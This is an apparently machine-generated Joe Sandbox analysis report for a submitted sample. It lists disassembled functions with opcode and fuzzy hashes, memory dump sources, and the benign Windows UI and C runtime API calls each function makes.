Opcode ID: 68e70884b6cfaecc754227d8b2a8a05f6dbd5c14c30a43bca02e609da5f9a651
Instruction ID: e53e2287233d10d40e8c1ff87404f370475895e610f5c88c673eae2927506647
Opcode Fuzzy Hash: 68e70884b6cfaecc754227d8b2a8a05f6dbd5c14c30a43bca02e609da5f9a651
Instruction Fuzzy Hash: BAF18E71609381CFC718CF2AC48496BBBE2EFC9364F148A2EF49597355D731E9068B52

Function 00700B43 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 55ddf96c386539b05eae56ac92889a411964f13db2c312b4253643dfd8d97ce7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: BCC1A336215093CADF2D4639C93423FBAE16AA27B1B1A175DD4B3CB1C4FE28D534DA60

Function 00700F78 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 655c8265b8504023e722fca4d00e2f6487db3540e8ea1272d91fe912a0eb6ef6
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 84C1A4362091938ADF2D463AC93413FFBE16AA27B171A176DD4B2CB0C4FE28D534D620

Function 0070070E Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 1a00e713d3f9a48aedf292b0bb000c6201a63a8ee3cb4eaccd78b8ceed1e14c3
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 7DC1C5362051938ADF2D4639893423FBAE16EA17B171A136DD4B3CB1C1FE2CD534DAA0

Function 006F6646 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d8d32a6572938a76caa27f6c50a6c9cb0ea7be270348314096ff6b8b9c6766c3
Instruction ID: 6a3ec2b6069e585b8af6995989b44d7a0d0a10c52cb20ca2db07b5bd74357b90
Opcode Fuzzy Hash: d8d32a6572938a76caa27f6c50a6c9cb0ea7be270348314096ff6b8b9c6766c3
Instruction Fuzzy Hash: 38D127B1A043498FCB14CF28C8817ABBBE2BF55308F04456DFA459B342D774E959CB9A

Function 007002F6 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: a7ad62de801521119ee1af8ed0b31dd9f0b2330efbc144caddf1e5fdf4019cab
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 75C1C6362051938ADF2D4639C93463FFAE16AA27B171A176DD4B3CB1C4FE28D534CA60

Function 006EE2A0 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5c08021a3406f0e0970da6c5233821b472a439b0f870429be7fe9eb2fcf0c4
Instruction ID: f933857da6241c38fc498707dc93af89be01b4cb08a18bd0da5f6ac728e1e2d9
Opcode Fuzzy Hash: ba5c08021a3406f0e0970da6c5233821b472a439b0f870429be7fe9eb2fcf0c4
Instruction Fuzzy Hash: 77E137755183848FC314CF29D89096ABBF0BF8A300F85495EF5D587352C339EA19DBA6

Function 006F3A3C Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: 4d3741550d8f1da79ed7e1e5a4fc5da43520c32f15c9315a214cc62e81477d09
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: C091567420479D8BDB24EF68C8A1BFE77D7AB90300F10092DE79787382DA74A645C756

Function 00704969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1ccfdd4607670727c09c07e1710bd8f611c0a07c25d1a42e2d6dd108f3b3fc
Instruction ID: cc506c9dbb32d70f48ea297cb94ff00ef3cdea1cf3b91c35e109538955e9c725
Opcode Fuzzy Hash: 8c1ccfdd4607670727c09c07e1710bd8f611c0a07c25d1a42e2d6dd108f3b3fc
Instruction Fuzzy Hash: 886159F1750708D6DE3499289859BBF73D4AB41304F108729FB82DB2C1D65DED41CB59

Function 006F3D6D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: 7d00eb89e2b9d99fa3b299405af41b6c5c727276034cbafae5852458411d9536
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: CA713C717043594BDB24DE68C8C1BBE77E7AF90304F10492EF7868B382DA74DA858756

Function 0070473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: 285623189d392693c0e4b2922ec94b2ecd46e7a3799117220b084d55cb0d97d7
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: 25514BF1600A84E7DB3889688859BBF67C99B53304F185F1DEB82D72C2C71DED458396

Function 006EDE6C Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da350e4df734e6fe1836a5fc703aef3861c9155814814e4b02385b9df6c7ab45
Instruction ID: c91761912fb567229eea5600b4ad4de7a184a4afafd208d057aa941c10d76bd1
Opcode Fuzzy Hash: da350e4df734e6fe1836a5fc703aef3861c9155814814e4b02385b9df6c7ab45
Instruction Fuzzy Hash: 9481939121E3D49EC72A4F7E38E42F53FA25737301B1980AAC4C586263C53E45AED76A

Function 006EE8A0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5970030a62e0525b14e27fb0a4b07f7974546d9e27c57c40ca21adb56d1a2a
Instruction ID: 5223868c0abdd24fc7273501f4ae983da6adcb147c8b0918c2b3181cb391ba63
Opcode Fuzzy Hash: 4d5970030a62e0525b14e27fb0a4b07f7974546d9e27c57c40ca21adb56d1a2a
Instruction Fuzzy Hash: 1051C23150A3D54EC712CF2A91444AEBFE2BEDA314F4949AEE4D54B203D226D649CB92

Function 006EF968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2edc710b61f8ced5604a7b3b8a88689d168d6b065f32f9ffbfce1df216b47ba3
Instruction ID: 094d7abcf4bf944f5daf0f5a059bac6e6f2c4d570e06beb33e10b67e23034a38
Opcode Fuzzy Hash: 2edc710b61f8ced5604a7b3b8a88689d168d6b065f32f9ffbfce1df216b47ba3
Instruction Fuzzy Hash: C3512671A083018FC748CF19D49059AF7E2FF88354F058A2EE899A7741DB34E959CB96

Function 006F37C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: b9054e2b0cea0eed080bb1d5a91a0bca2871c7cd15ff419067f20ca2c4223111
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 963126B56047598FCB14EF28C8512AEBBE2FB95300F10492DE5D5C7342C739EA49CBA6

Function 006E5F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09bf71ed7d342c90289370266a8fb2d3f0780af8da1022c1a4c455756e657c81
Instruction ID: d46e2f85a22f4de7914af1ad9721324da0f1ec31219d253b4041027b1be80717
Opcode Fuzzy Hash: 09bf71ed7d342c90289370266a8fb2d3f0780af8da1022c1a4c455756e657c81
Instruction Fuzzy Hash: 7921AD71A212714BC758CF2EDC904B67752A746311746C22BEE46873D1C539E925CBE0

Function 006EDA98 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006EDABE

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

Part of subcall function 006F1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00720EE8,00000200,006ED202,00000000,?,00000050,00720EE8), ref: 006F15B3

_strlen.LIBCMT ref: 006EDADF
SetDlgItemTextW.USER32(?,0071E154,?), ref: 006EDB3F
GetWindowRect.USER32(?,?), ref: 006EDB79
GetClientRect.USER32(?,?), ref: 006EDB85
GetWindowLongW.USER32(?,000000F0), ref: 006EDC25
GetWindowRect.USER32(?,?), ref: 006EDC52
SetWindowTextW.USER32(?,?), ref: 006EDC95
GetSystemMetrics.USER32(00000008), ref: 006EDC9D
GetWindow.USER32(?,00000005), ref: 006EDCA8
GetWindowRect.USER32(00000000,?), ref: 006EDCD5
GetWindow.USER32(00000000,00000002), ref: 006EDD47

Strings

Tq, xrefs: 006EDAFA
$%s:, xrefs: 006EDAB2
CAPTION, xrefs: 006EDC77
d, xrefs: 006EDBA5
I=u, xrefs: 006EDC9D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: I=u$$%s:$CAPTION$Tq$d
API String ID: 2407758923-230142928
Opcode ID: 99330ae383099bf20e1932af5f33cfc2cc54702eea5e940f0357b41680df35de
Instruction ID: e9630821430876864d2bb2ad3b105adcc644ac5777cd22287fa5f893b43f5019
Opcode Fuzzy Hash: 99330ae383099bf20e1932af5f33cfc2cc54702eea5e940f0357b41680df35de
Instruction Fuzzy Hash: 9281C071109345AFD710DF69CC88AAFBBEAEB89704F04491DFA8493291D774E90ACB52

Function 0070C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0070C277

Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE2F
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE41
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE53
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE65
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE77
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE89
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BE9B
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BEAD
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BEBF
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BED1
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BEE3
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BEF5
Part of subcall function 0070BE12: _free.LIBCMT ref: 0070BF07

_free.LIBCMT ref: 0070C26C

Part of subcall function 007084DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958), ref: 007084F4
Part of subcall function 007084DE: GetLastError.KERNEL32(00713958,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958,00713958), ref: 00708506

_free.LIBCMT ref: 0070C28E
_free.LIBCMT ref: 0070C2A3
_free.LIBCMT ref: 0070C2AE
_free.LIBCMT ref: 0070C2D0
_free.LIBCMT ref: 0070C2E3
_free.LIBCMT ref: 0070C2F1
_free.LIBCMT ref: 0070C2FC
_free.LIBCMT ref: 0070C334
_free.LIBCMT ref: 0070C33B
_free.LIBCMT ref: 0070C358
_free.LIBCMT ref: 0070C370

Strings

Pq, xrefs: 0070C249

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: Pq
API String ID: 161543041-3360047562
Opcode ID: f92e378810e3366e62c15309e0dedc0d81479177ed4a9d7ec98b0ea47cb39f7c
Instruction ID: 37e483bcedbad3feb61347184518e15669d64e4d9a69be707b0a1eb2ae40f8cc
Opcode Fuzzy Hash: f92e378810e3366e62c15309e0dedc0d81479177ed4a9d7ec98b0ea47cb39f7c
Instruction Fuzzy Hash: CE315C31600305DFEB62AF78D949B5AB3E9BF00310F148729F489DB9D1DF79AD808A52

Function 006FCD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 006FCD51
GetClassNameW.USER32(00000000,?,00000800), ref: 006FCD7D

Part of subcall function 006F17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,006EBB05,00000000,.exe,?,?,00000800,?,?,006F85DF,?), ref: 006F17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 006FCD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 006FCDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 006FCDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 006FCDED
DeleteObject.GDI32(00000000), ref: 006FCDF4
GetWindow.USER32(00000000,00000002), ref: 006FCDFD

Strings

STATIC, xrefs: 006FCD83

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: fd9574c90769962c46afad244f75befb91bef220af94114677da670d724c04d6
Instruction ID: 310cbce148cd60e1b1edb1660598ce8518b0c3d66fd753a30fbb2c50c0566ca3
